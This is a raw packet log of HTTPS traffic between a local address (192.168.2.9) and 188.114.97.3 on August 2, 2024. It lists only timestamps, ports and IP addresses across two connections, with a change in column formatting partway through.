Aug 2, 2024 14:16:48.407597065 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.407623053 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.407682896 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.412286043 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.412347078 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.417021036 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.417083979 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.417120934 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.417175055 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.421855927 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.421919107 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.426737070 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.426806927 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.431441069 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.431505919 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.441044092 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.441095114 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.441101074 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.441121101 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.441148996 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.441165924 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.450840950 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.450864077 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.450905085 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.450917006 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.450939894 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.450973034 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.451217890 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.451234102 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.451287985 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.451297045 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.451335907 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.451631069 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.451647043 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.451700926 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.451710939 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.451754093 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.452177048 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.452214956 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.452239037 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.452250004 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.452270985 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.452292919 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.497277021 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.497303963 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.497345924 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.497358084 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.497402906 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.497425079 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.497716904 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.497735977 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.497781038 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.497788906 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.497836113 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.498543978 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.498560905 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.498605967 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.498614073 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.498642921 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.498657942 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.500025034 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.500041008 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.500093937 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.500101089 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.500145912 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.500977993 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.500996113 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.501046896 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.501054049 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.501080036 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.501095057 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.502027988 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.502043962 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.502079964 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.502085924 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.502119064 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.502137899 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.503201008 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.503216982 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.503268003 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.503277063 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.503313065 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.504416943 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.504432917 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.504486084 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.504498959 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.504535913 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.602685928 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.602715969 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.602778912 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.602792978 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.602804899 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.603113890 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.603133917 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.603157043 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.603171110 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.603190899 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.603229046 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.603684902 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.603698969 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.603754044 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.603761911 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.603806973 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.604157925 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.604175091 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.604224920 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.604231119 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.604268074 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.604856968 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.604872942 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.604927063 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.604933023 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.604965925 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.604978085 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.605366945 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.605456114 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.605520964 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.605528116 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.605556965 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.605586052 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.608057022 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.608076096 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.608172894 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.608182907 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.608253002 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.608402014 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.608417034 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.608474016 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.608489037 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.608529091 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.687748909 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.687774897 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.687825918 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.687840939 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.687870979 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.687891006 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.688153028 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.688170910 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.688205004 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.688211918 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.9
Aug 2, 2024 14:16:48.688249111 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
Aug 2, 2024 14:16:48.688266993 CEST | 49706 | 443 | 192.168.2.9 | 188.114.97.3
                              Aug 2, 2024 14:16:48.688705921 CEST44349706188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.688723087 CEST44349706188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.688797951 CEST49706443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:48.688807964 CEST44349706188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.688842058 CEST49706443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:48.689327002 CEST44349706188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.689342976 CEST44349706188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.689388037 CEST49706443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:48.689395905 CEST44349706188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.689430952 CEST49706443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:48.689443111 CEST49706443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:48.689985991 CEST44349706188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.690004110 CEST44349706188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.690068960 CEST49706443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:48.690078974 CEST44349706188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.690113068 CEST49706443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:48.690474033 CEST44349706188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.690490961 CEST44349706188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.690534115 CEST49706443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:48.690541029 CEST44349706188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.690582991 CEST49706443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:48.691274881 CEST44349706188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.691291094 CEST44349706188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.691332102 CEST49706443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:48.691339970 CEST44349706188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.691375017 CEST49706443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:48.691395044 CEST49706443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:48.691735029 CEST44349706188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.691757917 CEST44349706188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.691795111 CEST49706443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:48.691802025 CEST44349706188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.691833019 CEST49706443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:48.691842079 CEST49706443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:48.695038080 CEST49706443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:48.779474020 CEST44349706188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.779496908 CEST44349706188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.779558897 CEST49706443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:48.779573917 CEST44349706188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.779594898 CEST44349706188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.779612064 CEST49706443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:48.779639006 CEST49706443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:48.783416986 CEST49706443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:48.783436060 CEST44349706188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.783446074 CEST49706443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:48.783451080 CEST44349706188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.957817078 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:48.957904100 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:48.958003044 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:48.959363937 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:48.959393978 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.447263956 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.447346926 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:49.449203014 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:49.449218988 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.449455976 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.451459885 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:49.496503115 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.899372101 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.899506092 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.899619102 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.899688959 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:49.899725914 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.899755001 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.899807930 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:49.899915934 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.899970055 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:49.899991989 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.900085926 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.900168896 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.900235891 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:49.900253057 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.900311947 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:49.900326014 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.946721077 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:49.946768045 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.990983009 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.991146088 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.991158009 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:49.991180897 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.991229057 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.991291046 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.991318941 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:49.991345882 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.991372108 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:49.991880894 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.991908073 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.991957903 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:49.991959095 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.991974115 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.992005110 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:49.992919922 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.992959023 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.992983103 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:49.992999077 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.993047953 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.993098021 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:49.993123055 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.993170023 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:49.993726969 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.993793011 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.993853092 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.993901968 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.993922949 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:49.993940115 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.994009972 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:49.994880915 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:49.994936943 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:49.994954109 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.031939983 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.032005072 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.032033920 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.082726955 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.082772017 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.082804918 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.082824945 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.082905054 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.082946062 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.083241940 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.083251953 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.083322048 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.083339930 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.083908081 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.083967924 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.083982944 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.084033012 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.084047079 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.084110022 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.084157944 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.084171057 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.084230900 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.084954977 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.085026026 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.085218906 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.085277081 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.086059093 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.086123943 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.086215973 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.086277008 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.086839914 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.086899996 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.086971045 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.087027073 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.087723017 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.087801933 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.087852001 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.087887049 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.087913990 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.087941885 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.087944984 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.123492002 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.123682976 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.123755932 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.123821974 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.174599886 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.174824953 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.175501108 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.175565958 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.175682068 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.175738096 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.175812960 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.175844908 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.175873041 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.175913095 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.175949097 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.176029921 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.176081896 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.176099062 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.176157951 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.176187038 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.176234961 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.176245928 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.176259041 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.176292896 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.176310062 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.182236910 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.182297945 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.182344913 CEST44349707188.114.97.3192.168.2.9
